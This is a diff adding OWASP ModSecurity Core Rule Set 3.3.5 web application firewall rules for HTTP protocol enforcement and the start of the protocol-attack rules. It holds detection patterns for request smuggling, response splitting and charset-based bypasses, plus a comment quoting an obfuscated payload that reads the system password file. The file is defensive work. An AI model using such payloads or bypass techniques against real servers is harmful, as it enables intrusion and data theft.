+#
+# Restrict charset parameter within the content-type header
+#
+SecRule REQUEST_HEADERS:Content-Type "@rx charset\s*=\s*[\"']?([^;\"'\s]+)" \
+ "id:920480,\
+ phase:1,\
+ block,\
+ capture,\
+ t:none,t:lowercase,\
+ msg:'Request content type charset is not allowed by policy',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153',\
+ tag:'PCI/12.1',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ chain"
+ SecRule TX:1 "!@rx ^%{tx.allowed_request_content_type_charset}$" \
+ "t:none,\
+ ctl:forceRequestBodyVariable=On,\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# Restrict charset parameter inside content type header to occur max once.
+# +SecRule REQUEST_HEADERS:Content-Type "@rx charset.*?charset" \ + "id:920530,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Multiple charsets detected in content type header',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restrict protocol versions. +# +SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \ + "id:920430,\ + phase:1,\ + block,\ + t:none,\ + msg:'HTTP protocol version is not allowed by policy',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restrict file extension +# +SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \ + "id:920440,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'URL file extension is restricted by policy',\ + logdata:'%{TX.0}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.extension=.%{tx.1}/',\ + chain" + SecRule TX:EXTENSION "@within %{tx.restricted_extensions}" \ + "t:none,t:urlDecodeUni,t:lowercase,\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Backup or "working" file extension +# example: index.php~, /index.php~/foo/ +# +SecRule REQUEST_FILENAME "@rx \.[^.~]+~(?:/.*|)$" \ + "id:920500,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Attempt to access a backup or 
working file',\ + logdata:'%{TX.0}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restricted HTTP headers +# +# -=[ Rule Logic ]=- +# The use of certain headers is restricted. They are listed in the variable +# TX.restricted_headers. +# +# The headers are transformed into lowercase before the match. In order to +# make sure that only complete header names are matching, the names in +# TX.restricted_headers are wrapped in slashes. This guarantees that the +# header Range (-> /range/) is not matching the restricted header +# /content-range/ for example. +# +# This is a chained rule, where the first rule fills a set of variables of the +# form TX.header_name_. The second rule is then executed for all +# variables of the form TX.header_name_. +# +# As a consequence of the construction of the rule, the alert message and the +# alert data will not display the original header name Content-Range, but +# /content-range/ instead. 
+#
+#
+# -=[ References ]=-
+# https://access.redhat.com/security/vulnerabilities/httpoxy (Header Proxy)
+#
+SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \
+ "id:920450,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:lowercase,\
+ msg:'HTTP header is restricted by policy (%{MATCHED_VAR})',\
+ logdata:'Restricted header detected: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ tag:'PCI/12.1',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',\
+ chain"
+ SecRule TX:/^header_name_/ "@within %{tx.restricted_headers}" \
+ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# Restrict response charsets that we allow.
+# The following rules make sure that the response will be in an ASCII-compatible charset that
+# phase 4 rules can properly understand and block.
+#
+
+#
+# Some servers rely on the request Accept header to determine what charset to respond with.
+# This rule restricts these to familiar charsets.
+#
+# Regular expression generated from util/regexp-assemble/data/920600.data.
+# To update the regular expression run the following shell script
+# (consult util/regexp-assemble/README.md for details):
+# util/regexp-assemble/regexp-assemble.py update 920600
+#
+SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+)\/(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+))(?:\s*+;\s*+(?:(?:charset\s*+=\s*+(?:\"?(?:iso-8859-15?|windows-1252|utf-8)\b\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\"(),\/:;<=>?![\x5c\]{}]|[^e\"(),/:;<=>?![\x5c\]{}])|[^s\"(),/:;<=>?![\x5c\]{}])|[^r\"(),/:;<=>?![\x5c\]{}])|[^a\"(),/:;<=>?![\x5c\]{}])|[^h\"(),/:;<=>?![\x5c\]{}])|[^c\"(),/:;<=>?![\x5c\]{}])[^\"(),/:;<=>?![\x5c\]{}]*(?:)\s*+=\s*+[^(),/:;<=>?![\x5c\]{}]+)|;?))*(?:\s*+,\s*+(?:(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+)\/(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+))(?:\s*+;\s*+(?:(?:charset\s*+=\s*+(?:\"?(?:iso-8859-15?|windows-1252|utf-8)\b\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\"(),\/:;<=>?![\x5c\]{}]|[^e\"(),/:;<=>?![\x5c\]{}])|[^s\"(),/:;<=>?![\x5c\]{}])|[^r\"(),/:;<=>?![\x5c\]{}])|[^a\"(),/:;<=>?![\x5c\]{}])|[^h\"(),/:;<=>?![\x5c\]{}])|[^c\"(),/:;<=>?![\x5c\]{}])[^\"(),/:;<=>?![\x5c\]{}]*(?:)\s*+=\s*+[^(),/:;<=>?![\x5c\]{}]+)|;?))*)*$" \
+ "id:920600,\
+ phase:1,\
+ block,\
+ t:none,t:lowercase,\
+ msg:'Illegal Accept header: charset parameter',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# The following rule (920620) checks for the presence of 2 or more request Content-Type headers.
+# Content-Type confusion poses a significant security risk to a web application. It occurs when
+# the server and client have different interpretations of the Content-Type header, leading to
+# miscommunication, potential exploitation and WAF bypass.
+#
+# Using Apache, when multiple Content-Type request headers are received, the server combines them
+# into a single header with the values separated by commas. For example, if a client sends multiple
+# Content-Type headers with values "application/json" and "text/plain", Apache will combine them
+# into a single header like this: "Content-Type: application/json, text/plain".
+#
+# On the other hand, Nginx handles multiple Content-Type headers differently. It preserves each
+# header as a separate entity without combining them. So, if a client sends multiple Content-Type
+# headers, Nginx will keep them separate, maintaining the original values.
+#
+SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \
+ "id:920620,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'Multiple Content-Type Request Headers',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+#
+# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
+#
+
+#
+# -=[ Rule Logic ]=-
+#
+# Check the number of range fields in the Range request header.
+#
+# An excessive number of Range request headers can be used to DoS a server.
+# The original CVE proposed an arbitrary upper limit of 5 range fields.
+#
+# Several clients are known to request PDF fields with up to 62 range
+# fields. Therefore the standard rule does not cover PDF files. This is
+# performed in two separate (stricter) siblings of this rule.
+# +# 920200: PL2: Limit of 5 range header fields for all filenames outside of PDFs +# 920201: PL2: Limit of 62 range header fields for PDFs +# 920202: PL4: Limit of 5 range header fields for PDFs +# +# -=[ References ]=- +# https://httpd.apache.org/security/CVE-2011-3192.txt + + +SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ + "id:920200,\ + phase:2,\ + block,\ + t:none,\ + msg:'Range: Too many fields (6 or more)',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_BASENAME "!@endsWith .pdf" \ + "setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + +# +# This is a sibling of rule 920200 +# + +SecRule REQUEST_BASENAME "@endsWith .pdf" \ + "id:920201,\ + phase:2,\ + block,\ + t:none,\ + msg:'Range: Too many fields for pdf request (63 or more)',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \ + "setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + + +SecRule ARGS "@rx %[0-9a-fA-F]{2}" \ + "id:920230,\ + phase:2,\ + block,\ + t:none,\ + msg:'Multiple URL Encoding Detected',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/267/120',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'WARNING',\ + setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + + +# +# Missing Accept Header +# +# 
-=[ Rule Logic ]=- +# This rule generates a notice if the Accept header is missing. +# +# Notice: The rule tries to avoid known false positives by ignoring +# OPTIONS requests coming from known offending User-Agents via two +# chained rules. +# As ModSecurity only reports the match of the last matching rule, +# the alert is misleading. +# +SecRule &REQUEST_HEADERS:Accept "@eq 0" \ + "id:920300,\ + phase:2,\ + pass,\ + t:none,\ + msg:'Request Missing an Accept Header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'NOTICE',\ + chain" + SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \ + "chain" + SecRule REQUEST_HEADERS:User-Agent "!@pm AppleWebKit Android" \ + "t:none,\ + setvar:'tx.anomaly_score_pl2=+%{tx.notice_anomaly_score}'" + +# +# PL2: This is a stricter sibling of 920270. +# +SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13,32-126,128-255" \ + "id:920271,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request (non printable characters)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + +# +# Missing User-Agent Header +# +# -=[ Rule Logic ]=- +# This rules will check to see if there is a User-Agent header or not. 
+#
+
+SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \
+ "id:920320,\
+ phase:2,\
+ pass,\
+ t:none,\
+ msg:'Missing User Agent Header',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ tag:'PCI/6.5.10',\
+ tag:'paranoia-level/2',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'NOTICE',\
+ setvar:'tx.anomaly_score_pl2=+%{tx.notice_anomaly_score}'"
+
+
+#
+# PL2: This is a stricter sibling of 920120.
+#
+SecRule FILES_NAMES|FILES "@rx ['\";=]" \
+ "id:920121,\
+ phase:2,\
+ block,\
+ t:none,t:urlDecodeUni,\
+ msg:'Attempted multipart/form-data bypass',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ tag:'paranoia-level/2',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+
+#
+# PL2: Block on Missing Content-Type Header with Request Body
+# This is a stricter sibling of rule 920340.
+# +# -=[ References ]=- +# http://httpwg.org/specs/rfc7231.html#header.content-type + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ + "id:920341,\ + phase:2,\ + block,\ + t:none,\ + msg:'Request Containing Content Requires Content-Type header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain" + SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ + "t:none,\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# + +# +# PL 3: This is a stricter sibling of 920270. 
Ascii range: Printable characters in the low range +# +# This rule is also triggered by the following exploit(s): +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 32-36,38-126" \ + "id:920272,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request (outside of printable chars below ascii 127)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# PL3: The little known x-up-devcap-post-charset request header can be used to submit +# a request with a different encoding as an alternative to the charset parameter in +# the Content-Type header. This can be used to circumvent charset restrictions on +# the Content-Type header in ASP.NET. +# Note that this only works in combination with a User-Agent prefix. 
+#
+# This rule is based on a blog post by Soroush Dalili at
+# https://soroush.secproject.com/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/
+#
+SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \
+ "id:920490,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'Request header x-up-devcap-post-charset detected in combination with prefix \'UP\' to User-Agent',\
+ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\
+ tag:'language-aspnet',\
+ tag:'platform-windows',\
+ tag:'attack-protocol',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ tag:'paranoia-level/3',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ chain"
+ SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up" \
+ "t:none,\
+ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
+
+
+#
+# Cache-Control Request Header whitelist
+#
+# -=[ Rule Logic ]=-
+# This rule aims to strictly whitelist the Cache-Control request header
+# values and to blocks all violations. This should be useful to intercept
+# "bad bot" and tools that impersonate a real browser but with wrong request
+# header setup.
+#
+# The regular expression used on this rule tries to match multiple directives
+# in a single value, for example: "max-stale=1, max-age=2". This leads us to
+# use a regular expression that accepts a trailing comma to keep compatibility
+# with all regex engines and not PCRE only. For example: "max-stale=1, max-age=2, "
+#
+# Moreover, this regular expression allows duplicate directives sequence like:
+# "max-stale, max-stale=1, no-cache, no-cache".
+# +# Standard Cache-Control directives that can be used by the client: +# - max-age= +# - max-stale[=] +# - min-fresh= +# - no-cache +# - no-store +# - no-transform +# - only-if-cached +# +# References: +# - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control +# - https://regex101.com/r/CZ0Hxu/22 +# +SecRule &REQUEST_HEADERS:Cache-Control "@gt 0" \ + "id:920510,\ + phase:1,\ + block,\ + t:none,\ + msg:'Invalid Cache-Control request header',\ + logdata:'Invalid Cache-Control value in request found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'header-whitelist',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain" + SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(\s*\,\s*|$)){1,7}$" \ + "setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# + +# +# This is a stricter sibling of rule 920200 +# + +SecRule REQUEST_BASENAME "@endsWith .pdf" \ + "id:920202,\ + phase:2,\ + block,\ + t:none,\ + msg:'Range: Too many fields for pdf request (6 or more)',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx 
^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ + "setvar:'tx.anomaly_score_pl4=+%{tx.warning_anomaly_score}'" + + +# +# This is a stricter sibling of 920270. +# +# This rule is also triggered by the following exploit(s): +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +SecRule ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 38,44-46,48-58,61,65-90,95,97-122" \ + "id:920273,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request (outside of very strict set)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + +# +# This is a stricter sibling of 920270. +# +SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,65-90,95,97-122" \ + "id:920274,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request headers (outside of very strict set)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + +# +# This is a stricter sibling of 920270. +# The 'Sec-Fetch-User' header may contain the '?' (63) character. +# Therefore we exclude this header from rule 920274 which forbids '?'. 
+# https://www.w3.org/TR/fetch-metadata/#http-headerdef-sec-fetch-user
+#
+SecRule REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,63,65-90,95,97-122" \
+ "id:920275,\
+ phase:2,\
+ block,\
+ t:none,t:urlDecodeUni,\
+ msg:'Invalid character in request headers (outside of very strict set)',\
+ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ tag:'paranoia-level/4',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
+
+# -=[ Abnormal Character Escapes ]=-
+#
+# [ Rule Logic ]
+# Consider the following payload: arg=cat+/e\tc/pa\ssw\d
+# Here, \s and \d were only used to obfuscate the string passwd and a lot of
+# parsers will silently ignore the non-necessary escapes. The case with \t is
+# a bit different though, as \t is a natural escape for the TAB character,
+# so we will avoid this (and \n, \r, etc.).
+#
+# This rule aims to detect non-necessary, abnormal escapes. You could say it is
+# a nice way to forbid the backslash character where it is not needed.
+#
+# This is a new rule at paranoia level 4. We expect quite a few false positives
+# for this rule and we will later evaluate if the rule makes any sense at all.
+# The rule is redundant with 920273 and 920274 in PL4. But if the rule proofs
+# to be useful and false positives remain at a reasonable level, then it might
+# be shifted to PL3 in a future release, where it would be the only rule
+# covering the backslash escape.
+#
+# We forbid backslashes followed by a list of basic ascii characters - unless
+# the backslash is preceded by another backslash.
+#
+# This rule is also triggered by the following exploit(s):
+# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ]
+#
+SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\\\\])\\\\[cdeghijklmpqwxyz123456789]" \
+ "id:920460,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\
+ log,\
+ msg:'Abnormal character escapes in request',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/4',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/153/267',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
+
+
+#
+# -= Paranoia Levels Finished =-
+#
+SecMarker "END-REQUEST-920-PROTOCOL-ENFORCEMENT"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-921-PROTOCOL-ATTACK.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-921-PROTOCOL-ATTACK.conf
new file mode 100644
index 000000000..fe5d4f68a
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-921-PROTOCOL-ATTACK.conf
@@ -0,0 +1,460 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+#
+# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
+#
+
+#
+# -=[ HTTP Request Smuggling ]=-
+#
+# [ Rule Logic ]
+# This rule looks for a HTTP / WEBDAV method name in combination with the word http/\d or a CR/LF character.
+# This would point to an attempt to inject a 2nd request into the request, thus bypassing
+# tests carried out on the primary request.
+#
+# [ References ]
+# http://projects.webappsec.org/HTTP-Request-Smuggling
+#
+SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connect|put|delete|trace|track|patch|propfind|propatch|mkcol|copy|move|lock|unlock)\s+(?:\/|\w)[^\s]*(?:\s+http\/\d|[\r\n])" \
+ "id:921110,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\
+ msg:'HTTP Request Smuggling Attack',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272/220/33',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# -=[ HTTP Response Splitting ]=-
+#
+# [ Rule Logic ]
+# These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters.
+# These characters may cause problems if the data is returned in a respones header and
+# may be interpreted by an intermediary proxy server and treated as two separate
+# responses.
+#
+# [ References ]
+# http://projects.webappsec.org/HTTP-Response-Splitting
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx [\r\n]\W*?(?:content-(?:type|length)|set-cookie|location):\s*\w" \
+ "id:921120,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecodeUni,t:lowercase,\
+ msg:'HTTP Response Splitting Attack',\
